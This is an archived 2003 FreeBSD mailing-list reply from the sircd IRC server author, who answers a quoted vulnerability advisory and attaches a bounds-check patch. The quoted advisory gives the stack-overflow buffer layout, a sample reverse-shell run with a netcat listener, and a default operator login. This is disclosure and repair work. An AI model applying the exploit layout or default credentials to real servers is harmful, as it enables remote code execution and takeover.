Date: Tue, 04 Feb 2003 10:35:08 +0000 From: Zarjazz <zarjazz@barrysworld.com> To: =?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?= <kain@ircop.dk> Cc: ports@freebsd.org Subject: Re: sircd buffer overflow Message-ID: <3E3F975C.9070109@barrysworld.com> In-Reply-To: <002901c2cbd0$1ded9220$24029dd9@tuborg> References: <002901c2cbd0$1ded9220$24029dd9@tuborg>
next in thread | previous in thread | raw e-mail | index | archive | help
This is an OpenPGP/MIME signed message (RFC 2440 and 3156) --------------enig0C38CDF729303AEFC707DCD5 Content-Type: multipart/mixed; boundary="------------070609010800040607000708" This is a multi-part message in MIME format. --------------070609010800040607000708 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Thanks for the info but I'd like to say that the BSD ports version of sircd is / was nothing to do with me and v0.4.0 was the initial alpha release and is now more than 1 year old compared to the current CVS tree so someone has not been keeping the source upto date! > II. DESCRIPTION > > a: Insufficient bounds checking leads to execution of arbitrary code. Patch attached to sanity check the dns lookup however I see this more as a bug than an exploit as you need root access on the system before you actually edit /etc/hosts in the first place. I would be interested to know if the current CVS version is affected in the same way as a lot has change since the 0.4.x tree. > b: Default oper account matching *!*@* In all my releases I only ever included an example.conf file under docs/ so I can't take the blame for anyone running a server with an unaltered config file :) Zarjazz Knud Erik Højgaard wrote: > A heads up.. > > > ------------------------------------------------------------------------ > > I. BACKGROUND > > According to the vendor "The 'sircd' project started as an idea from > the QuakeNet IRC Network coding team to develop a completely new irc > server that had none of the problems of the original ircd, such as > instability, scalability issues, redundant, badly written code and > other nasty things. " > More info is available at http://www.sircd.org. > > II. DESCRIPTION > > a: Insufficient bounds checking leads to execution of arbitrary code. > b: Default oper account matching *!*@* > > III. ANALYSIS > > a: > Upon checking the reverse dns of a connecting user, if the returned > value is longer than a certain length a classic stack overflow occurs. > > The buffer may be constructed as such: > [94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode], > leaving us with plenty of space both before and after eip to store our > shellcode. > > The accompanying .sh script is a silly proof of concept. > Below is a fabricated copy of a typical run: > > [shell 1] > $ nc -l -v -p 10000 > listening on [any] 10000 ... > > [shell 2] > # ./sircd.sh 127.0.0.1 > > sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker> > > UID check passed, backing up /etc/hosts > Now connect to the sircd from 127.0.0.1 > Press a key and enter to restore /etc/hosts > asd > Game over man, game over > # > > [shell 3] > $ sircd & > [1] 75711 > $ > > ===================================== > sircd: v0.4.0 Alpha > Author(s) > Zarjazz (zarjazz@barrysworld.com) > ===================================== > sircd initialized > SSL initialized > > $ BitchX 127.0.0.1 > [snip some bitchx output] > [fi] *** Welcome to the_server > [fi] *** Resolving IP 127.0.0.1 > --from here on the connection freezes. > > [shell 2] > fah > Game over man, game over > # > > [shell 1] > connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869 > id > uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user) > > b: type /oper bod bod bod in a connected irc-client. > > IV. DETECTION > > sircd-0.4.0 shipping with FreeBSD ports as well as from www.sircd.org > as per 03/02-03 is found to be vulnerable. > > V. WORKAROUND > > unknown > > VI. VENDOR FIX > > unknown > > VII. CVE INFORMATION > > unknown > > VIII. DISCLOSURE TIMELINE > > 03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified. > > IX. CREDIT > > Knud Erik Højgaard --------------070609010800040607000708 Content-Type: text/plain; name="sircd.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="sircd.patch" diff -rubBN sircd-0.4.0/sircd/src/ircd_callbacks.c sircd-0.4.0.fix/sircd/src/ircd_callbacks.c --- sircd-0.4.0/sircd/src/ircd_callbacks.c Sat Feb 2 17:44:49 2002 +++ sircd-0.4.0.fix/sircd/src/ircd_callbacks.c Tue Feb 4 10:12:37 2003 @@ -314,7 +314,7 @@ { /* not cached, so do a dns lookup of the ip address */ struct hostent *host_ent = gethostbyaddr((char * ) &addr.sin_addr, sizeof(addr.sin_addr), AF_INET); - if (host_ent) + if (host_ent && host_ent->h_length < HOSTLEN) ip_tree->left = (void *) str_dup(host_ent->h_name); else ip_tree->left = (void *) str_dup(cl_ip); --------------070609010800040607000708-- --------------enig0C38CDF729303AEFC707DCD5 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (MingW32) iD8DBQE+P5diPx/nyuA99rgRAgFnAJ4/hTRCoihNONNatt0GVKNhbvPPVQCfYY3t RuvNyXleBQHkTqNAW+BCVTE= =DsDa -----END PGP SIGNATURE----- --------------enig0C38CDF729303AEFC707DCD5-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3E3F975C.9070109>